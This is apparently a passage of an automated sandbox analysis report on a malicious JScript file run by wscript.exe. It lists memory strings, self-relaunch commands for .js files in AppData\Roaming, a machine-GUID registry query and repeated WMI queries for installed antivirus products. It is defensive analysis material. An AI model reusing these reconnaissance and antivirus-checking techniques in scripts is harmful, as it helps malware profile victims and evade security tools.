              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: creationclassname
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: stringcreationclassname
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cscreationclassname
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: stringcscreationclassname
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: csdversion
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: stringcsdversion
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: csname
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: stringcsname
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: currenttimezone
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: stringcurrenttimezone
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sint16
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dataexecutionprevention_32bitapplications
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sint16dataexecutionprevention_32bitapplications
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: boolean
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dataexecutionprevention_available
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: booleandataexecutionprevention_available
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dataexecutionprevention_drivers
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: booleandataexecutionprevention_drivers
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dataexecutionprevention_supportpolicy
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: booleandataexecutionprevention_supportpolicy
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: uint8
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: debug
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: uint8debug
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: description
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: booleandescription
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: distributed
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: stringdistributed
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: encryptionlevel
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: booleanencryptionlevel
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: uint32
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: foregroundapplicationboost
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: uint32foregroundapplicationboost
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: freephysicalmemory
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: uint8freephysicalmemory
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: uint64
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: freespaceinpagingfiles
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: uint64freespaceinpagingfiles
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: freevirtualmemory
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: uint64freevirtualmemory
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: installdate
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: uint64installdatee
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: datetime
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: largesystemcache
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: datetimelargesystemcache
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: lastbootuptime
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: uint32lastbootuptimee
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: localdatetime
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: datetimelocaldatetimee
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: locale
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: datetimelocale
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: manufacturer
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: stringmanufacturer
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: maxnumberofprocesses
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: stringmaxnumberofprocesses
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: maxprocessmemorysize
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: uint32maxprocessmemorysize
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: muilanguages
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: uint64muilanguages
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: stringname
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: numberoflicensedusers
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: stringnumberoflicensedusers
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: numberofprocesses
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: uint32numberofprocesses
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: numberofusers
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: uint32numberofusers
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: operatingsystemsku
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: uint32operatingsystemsku
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: organization
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: uint32organization
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: osarchitecture
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: stringosarchitecture
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: oslanguage
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: stringoslanguage
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: osproductsuite
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: uint32osproductsuite
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ostype
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 8uint32ostype
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: uint16
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: othertypedescription
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: guint16othertypedescription
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: paeenabled
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: stringpaeenabled
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: plusproductid
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: booleanplusproductid
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: plusversionnumber
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: stringplusversionnumber
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: portableoperatingsystem
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: stringportableoperatingsystem
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: primary
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: booleanprimary
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: producttype
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: booleanproducttype
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: registereduser
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: uint32registereduser
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: serialnumber
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: stringserialnumber
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: servicepackmajorversion
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: stringservicepackmajorversion
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: servicepackminorversion
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: uint16servicepackminorversion
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sizestoredinpagingfiles
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: uint16sizestoredinpagingfiles
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: status
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: uint64status
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: systemdevice
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: uint32systemdevice
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: systemdirectory
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: stringsystemdirectory
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: systemdrive
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: stringsystemdrive
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: desktop-716t771
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: computer!
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: athtosignedprodu
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: not_nul
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -9e44-da
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 5-9e44-da
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: defender
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: win32_operatingsystem
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: {082927ab-dedc-4263-82f9-82a923849650}
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: win32_operatingsystem{082927ab-dedc-4263-82f9-82a923849650}+
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1root\cimv2c
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: win32_operatingsystem{082927ab-dedc-4263-82f9-82a923849650}/
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: af_unixf
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: msafd tcpip [tcp/ip]2\mswsock.dll,-60100
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: msafd tcpip [udp/ip]2\mswsock.dll,-60101
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: msafd tcpip [raw/ip]2\mswsock.dll,-60102f
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: msafd tcpip [tcp/ipv6]mswsock.dll,-60200
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: msafd tcpip [udp/ipv6]mswsock.dll,-60201
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: msafd tcpip [raw/ipv6]mswsock.dll,-60202f
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rsvp tcpv6 service providers.dll,-100f
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rsvp tcp service providerqos.dll,-101&
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rsvp udpv6 service providers.dll,-102&
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rsvp udp service providerqos.dll,-103&
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hyper-v raw
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: msafd irda [irda]
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\windows\system32;c:\windows\system32;c:\windows\system;c:\windows;.;c:\program files (x86)\common files\oracle\java\javapath;c:\windows\system32;c:\windows;c:\windows\system32\wbem;c:\windows\system32\windowspowershell\v1.0\;c:\windows\system32\openssh\;c:\users\user\appdata\local\microsoft\windowsapps;
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rsvp tcp service provider9
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: msafd irda [irda]f
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 202 (,
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 7t;h0h<
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 7$3t
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0|2l#89
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: )\8t*
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d7l4d=
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 8@1l$d=
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ecuritycenterfication window
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ecuritycenter
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: url moniker notification window
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rsvp tcpv6 service provider
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (<pdx
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $8l`t
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\CekIalTska.jsJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\Order Requirement 2022.jsJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\CekIalTska.jsJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\CekIalTska.jsJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\CekIalTska.jsJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\Order Requirement 2022.jsJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\CekIalTska.js
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.862567864.00000228B31AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.379605818.00000228B314F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.851874113.00000228B3130000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.379274839.00000228B317E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.379481262.00000228B319F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.818173441.00000228B09F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.378710691.00000228B3161000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.400937487.0000025291B6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.401267934.0000025291B77000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.401644606.0000025291B83000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: wscript.exe, 00000001.00000003.379274839.00000228B317E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.379726865.00000228B3194000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.378710691.00000228B3161000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \Windows Defender\MsMpeng.exe
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\securitycenter2 : select * from antivirusproduct
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
